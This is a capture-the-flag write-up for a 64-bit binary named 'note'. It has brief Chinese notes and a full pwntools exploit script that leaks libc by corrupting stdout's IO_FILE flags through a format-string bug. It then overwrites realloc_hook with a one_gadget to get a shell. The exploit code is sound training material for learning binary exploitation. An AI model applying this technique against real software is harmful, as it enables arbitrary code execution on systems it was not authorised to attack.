note
64位,全保护,使用libc-2.23.so
Tag: scanf字符串格式化洞 IO_File
思路
- 利用 `say` 函数的scanf字符串格式化漏洞对IO_FILE的stdout进行写入,改小flag位置,从而进行libc_leak
- 再次利用此漏洞向 `malloc_hook` 写入one_gadget
- og栈帧条件不满足,使用realloc微调
TIPS:任何把用户输入直接当作格式化字符串使用的函数均存在这一漏洞
EXP
from pwn import *
import sys
name = sys.argv[1]
elf = ELF(name)
libc = elf.libc
sh = 0  # placeholder; rebound to the live tube inside main()


def l64():
    """Receive up to the next 0x7f byte and unpack its last 6 bytes as a u64."""
    chunk = sh.recvuntil("\x7f")
    return u64(chunk[-6:].ljust(8, "\x00"))


def l32():
    """Receive up to the next 0xf7 byte and unpack its last 4 bytes as a u32."""
    chunk = sh.recvuntil("\xf7")
    return u32(chunk[-4:].ljust(4, "\x00"))


def sla(a, b):
    """sendlineafter, with both arguments coerced through str()."""
    return sh.sendlineafter(str(a), str(b))


def sa(a, b):
    """sendafter, with both arguments coerced through str()."""
    return sh.sendafter(str(a), str(b))


def lg(name, data):
    """Log ``data`` as a hex value under the label ``name`` via sh.success()."""
    return sh.success(name + ": 0x%x" % data)


def se(payload):
    """Raw send of ``payload``."""
    return sh.send(payload)


def rl():
    """Receive whatever is currently available."""
    return sh.recv()


def sl(payload):
    """Send ``payload`` followed by a newline."""
    return sh.sendline(payload)


def ru(a):
    """Receive until str(a) is seen."""
    return sh.recvuntil(str(a))
def cmd(ch):
    """Pick menu entry ``ch`` at the "choice: " prompt (ch is str()-coerced)."""
    sh.sendlineafter("choice: ", str(ch))
def main(ip,port,debug,mode):
    """Run the two-round interaction described in the notes above.

    Args:
        ip, port: remote endpoint; only used when ``mode`` is non-zero.
        debug: ``0`` switches pwntools logging to "debug" (note the
            inverted sense: zero means *more* output).
        mode: ``0`` runs the local binary ``name``; anything else connects
            to ``ip:port``.

    Side effects: rebinds the module-level ``sh`` and ends by handing the
    session to ``sh.interactive()``.
    """
    global sh
    if debug==0:
        context.log_level = "debug"
    else:
        pass
    if mode==0:
        sh = process(name)
    else:
        sh = remote(ip,port)
    # Round 1: menu option 2 ("say"), the format-string input from the notes.
    cmd(2)
    sa("say ? ","%7$s\x00")
    sh.sendline(p64(0xfbad1800)+p64(0)*3)
    # NOTE(review): str fill on a recv() result is Python 2 pwntools style;
    # on Python 3 the received value is bytes and bytes.ljust needs a bytes
    # fillchar — confirm which interpreter this was run under.
    # 0x3c36e0 (and 0x4527a below) are constants for the libc-2.23 build named
    # in the notes; any other libc build needs them re-derived.
    libcbase = u64(ru("\x7f")[-6:].ljust(8,"\x00"))-0x3c36e0
    malloc_hook = libcbase+libc.sym["__malloc_hook"]
    realloc_hook = libcbase + libc.sym["__realloc_hook"]
    realloc = libcbase + libc.sym["realloc"]
    og = libcbase + 0x4527a  # one_gadget offset for this libc build
    lg("libcbase",libcbase)
    lg("malloc_hook",malloc_hook)
    lg("og",og)
    lg("realloc",realloc)
    lg("realloc_hook",realloc_hook)
    # Round 2: same "say" path again, aimed at realloc_hook computed above;
    # the realloc+6 entry is the "realloc adjustment" mentioned in the notes.
    cmd(2)
    sh.sendlineafter("say ? ","%7$s"+"\x00"*4+p64(realloc_hook))
    sh.sendlineafter("? ",p64(og)+p64(realloc+6))
    # Menu option 1 with a size triggers the allocation path.
    cmd(1)
    sla("size: ",0x10)
    sh.interactive()
if __name__ == '__main__':
    # Local run: mode=0 -> process(name), so ip/port are ignored;
    # debug=0 -> pwntools log_level "debug".
    main(0,0,0,0)